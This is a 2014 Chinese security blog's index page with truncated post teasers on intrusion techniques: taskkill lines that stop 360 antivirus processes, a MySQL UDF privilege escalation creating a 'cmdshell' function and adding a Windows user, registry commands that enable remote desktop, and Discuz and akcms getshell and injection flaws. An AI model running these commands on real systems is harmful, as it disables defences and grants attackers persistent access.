Stay Hungry,Stay Foolish(求知若饥,虚心若愚。)——Steve Jobs

feed订阅 腾讯微博 新浪微博 twitter 你好,欢迎光临!

C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\ C:\php\PEAR\ C:\Program Files\Zend\ZendOptimizer-3.3.0\ C:\Program Files\Common Files\ C:\7i24....

利用进程PID结束进程

2014.03.26, 经验分享 ,抢沙发,3399人打酱油
taskkill /f /t /im 进程.exe   结束360如下: TASKKILL /F /IM ZhuDongFangYu.exe /IM 360rps.exe /IM 360tray.exe /IM 360sd.exe /IM 360sd.exe /IM 360rp.exe 利用...

Mysql4种提 权方法

2014.03.26, 经验分享 ,1条评论,3140人打酱油
一 UDF提权  这类提权方法我想大家已经知道了,我大致写一下,具体语句如下:  create function cmdshell returns string soname ’udf.dll’   select cmdshell(’net user iis_user 123!@#...
1.查询终端端口 REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber 2.开3389 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal"...
CMD命令行下查看服务器远程桌面登录端口 Windows Server服务器远程登录端口默认为3389, 如果要查看确认当前使用的远程登陆端口可以使用 tasklist /svc netstat /ano 两条命令查出来。打开“开始”-“运行”,输入cmd回车进入命令行界面。输入 tasklist /svc 回车,...
Discuz X2.5最新版爆路径0day漏洞 漏洞证明:http://www.erdare.com/source/plugin/myrepeats/table/table_myrepeats.php   修复方案:加!defined(‘IN_UC’) && exit(‘Access Denied’);就好...
discuz x1.5 discuz 7.2 后台getshell 0day通杀0day discuz x1.5 discuz 7.2 后台getshell 0day通杀版 方法为: 后台:插件--添加插件--请选择导入方式:上传本帖附件中的XML文件 并同时勾选上 允许导入不同版本 Discuz! 的插件(易产生错误...

akcms注入漏洞

2014.03.25, 漏洞发布 ,2条评论,4013人打酱油
akcms注入漏洞 漏洞详情 披露状态:   2012-09-27: 细节已通知厂商并且等待厂商处理中 2012-09-27: 厂商已经确认,细节仅向厂商公开 2012-10-07: 细节向核心白帽子及相关领域专家公开 2012-10-17: 细节向普通白帽子公开 2012-10-2...

akcms代码执行漏洞

2014.03.25, 漏洞发布 ,1条评论,2985人打酱油
akcms代码执行漏洞 周挖出的akcms的后台模版getshell感觉没什么新意,然后又仔细看了看代码,发现了一个比较有“前途”的洞,代码执行漏洞,而且出问题函数是作者提供给建站用户进行二次开发时使用的,也就是说这个问题放大的程度也会要大些。  0×01、原理分析   漏洞问题主要存在于include\com...
以下是引用片段: //搜索词预处理 $searchword = empty($searchword) ? '' : cutstr(trim($searchword),50,''); $_da['searchword'] = $searchword; if($searchword){     ...